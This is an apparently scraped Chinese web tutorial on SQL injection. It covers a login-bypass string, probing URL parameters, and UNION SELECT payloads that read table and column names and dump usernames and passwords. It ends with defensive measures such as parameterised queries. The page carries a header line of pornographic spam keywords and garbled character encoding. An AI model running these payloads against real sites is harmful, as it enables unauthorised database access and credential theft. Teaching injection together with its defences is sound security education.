五月综合激情婷婷六月,日韩欧美国产一区不卡,他扒开我内裤强吻我下面视频 ,无套内射无矿码免费看黄,天天躁,日日躁,狠狠躁

新聞動(dòng)態(tài)

SQL注入的實(shí)現(xiàn)以及防范示例詳解

發(fā)布日期:2022-01-30 14:30 | 文章來(lái)源:源碼中國(guó)

什么是SQL注入

SQL注入是指通過(guò)構(gòu)建特殊的輸入篡改原來(lái)的SQL語(yǔ)句達(dá)到攻擊者所需的操作。

Sql 注入產(chǎn)生原因

我們?cè)L問(wèn)動(dòng)態(tài)網(wǎng)頁(yè)時(shí)往往會(huì)向服務(wù)器發(fā)送請(qǐng)求,服務(wù)器向數(shù)據(jù)訪問(wèn)層發(fā)起 Sql 查詢請(qǐng)求,若驗(yàn)證通過(guò)就會(huì)執(zhí)行 Sql 語(yǔ)句。如果用戶輸入的數(shù)據(jù)被構(gòu)造成惡意Sql代碼,如果程序沒(méi)有細(xì)致地過(guò)濾用戶輸入的數(shù)據(jù)則會(huì)使非法數(shù)據(jù)侵入系統(tǒng)。

登錄案例講解

select * from admin where uname='用戶名' and pwd='密碼'

輸入 'or 1=1 #(–空格或–+或#:注釋掉后面的sql語(yǔ)句)

這時(shí)SQL語(yǔ)句變?yōu)椋?code>select * from admin where uname='' or 1=1 # and pwd='密碼',這時(shí)SQL語(yǔ)句永遠(yuǎn)成立,繞過(guò)登錄。

基于GET方式的SQL注入

通過(guò)在URL中修改對(duì)應(yīng)的ID值,為正常數(shù)字、大數(shù)字、字符(單引號(hào)、雙引號(hào)、雙單引號(hào)、括號(hào))、反斜杠來(lái)探測(cè)URL中是否有注入點(diǎn)。

可登陸到mituan.zone進(jìn)行測(cè)試

1、' '1'' LIMIT 0,1 ' :多了一個(gè)單引號(hào)

可猜測(cè)SQL語(yǔ)句為:select login_name,password from admin where id = 'id' limit 0,1

2、' ' LIMIT 0,1 ':多了一個(gè)單引號(hào)

可猜測(cè)SQL語(yǔ)句為:select login_name,password from admin where id = id limit 0,1

3、' '1'') LIMIT 0,1 ':多了一個(gè)單引號(hào)

可猜測(cè)SQL語(yǔ)句為:select login_name,password from admin where id = ('id') limit 0,1

4、單引號(hào)、括號(hào)都不報(bào)錯(cuò)說(shuō)明被接收的是字符串類型' "1"") LIMIT 0,1 ':多了一個(gè)雙引號(hào)

可猜測(cè)SQL語(yǔ)句為:select login_name,password from admin where id = ("id") limit 0,1

SQL注入利用

1、利用order by判斷字段數(shù)

order by n(n為猜測(cè)字段數(shù))--+

以案例一為例

select login_name,password from admin where id = 'id' limit 0,1
用?id=1' order by 11--+

猜測(cè)錯(cuò)誤時(shí)則會(huì)報(bào)錯(cuò)

此時(shí)探測(cè)到有3個(gè)字段,用?id=0' union select 1,2,3--+探測(cè)到Login_name在第二列,Password在第三列,則第二、三列可利用。

?id=0' union select 1,2,3--+2,3改為user():查看當(dāng)前MYSQL登錄用戶名,database():查看當(dāng)前使用MYSQL數(shù)據(jù)庫(kù)名,version():查看當(dāng)前MYSQL版本,如改為?id=0'union select 1,user(),database()--+ 得到下圖中信息

2、利用union select 聯(lián)合查詢,獲取表名。(在使用union select時(shí)要將前面的SQL語(yǔ)句報(bào)錯(cuò))

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

3、利用union select 聯(lián)合查詢,獲取字段名。(以上面查詢到的users表為例)

union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

4、利用union select 聯(lián)合查詢,獲取字段值。(以上面查詢到的users表為例)

union select 1,group_concat(username,0x3a,password),3 from users--+ (0x3a為冒號(hào),用來(lái)分隔不同字段的值)

如果是地址欄不能顯示信息的POST形式則可以在對(duì)話框中輸入注入語(yǔ)句






這里使用的方法和在地址欄中的輸入一樣,都是先報(bào)錯(cuò)前面的SQL語(yǔ)句再使用union select聯(lián)合查詢拿出表中數(shù)據(jù)

SQL 注入的防范方法

  • 對(duì)用戶的輸入進(jìn)行過(guò)濾。如:對(duì)用戶的輸入進(jìn)行校驗(yàn),可以通過(guò)正則表達(dá)式、限制長(zhǎng)度、對(duì)單引號(hào)和雙"-"進(jìn)行轉(zhuǎn)換等。
  • 編寫(xiě)程序時(shí)不要使用動(dòng)態(tài)拼裝sql,可以使用參數(shù)化的sql或者直接使用存儲(chǔ)過(guò)程進(jìn)行數(shù)據(jù)查詢存取。
  • 不要直接使用管理員權(quán)限的數(shù)據(jù)庫(kù)連接,每個(gè)應(yīng)用使用單獨(dú)的且權(quán)限有限的數(shù)據(jù)庫(kù)。
  • 不要把機(jī)密信息直接存放,加密或者h(yuǎn)ash掉密碼和敏感的信息。
  • 程序的異常信息應(yīng)該給出盡可能少的提示,最好使用自定義的錯(cuò)誤信息對(duì)原始錯(cuò)誤信息進(jìn)行包裝。

總結(jié)

到此這篇關(guān)于SQL注入的實(shí)現(xiàn)以及防范的文章就介紹到這了,更多相關(guān)SQL注入實(shí)現(xiàn)及防范內(nèi)容請(qǐng)搜索本站以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持本站!

香港服務(wù)器租用

版權(quán)聲明:本站文章來(lái)源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請(qǐng)保持原文完整并注明來(lái)源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非maisonbaluchon.cn所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來(lái)源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來(lái),僅供學(xué)習(xí)參考,不代表本站立場(chǎng),如有內(nèi)容涉嫌侵權(quán),請(qǐng)聯(lián)系alex-e#qq.com處理。

相關(guān)文章

實(shí)時(shí)開(kāi)通

自選配置、實(shí)時(shí)開(kāi)通

免備案

全球線路精選!

全天候客戶服務(wù)

7x24全年不間斷在線

專屬顧問(wèn)服務(wù)

1對(duì)1客戶咨詢顧問(wèn)

在線
客服

在線客服:7*24小時(shí)在線

客服
熱線

400-630-3752
7*24小時(shí)客服服務(wù)熱線

關(guān)注
微信

關(guān)注官方微信
頂部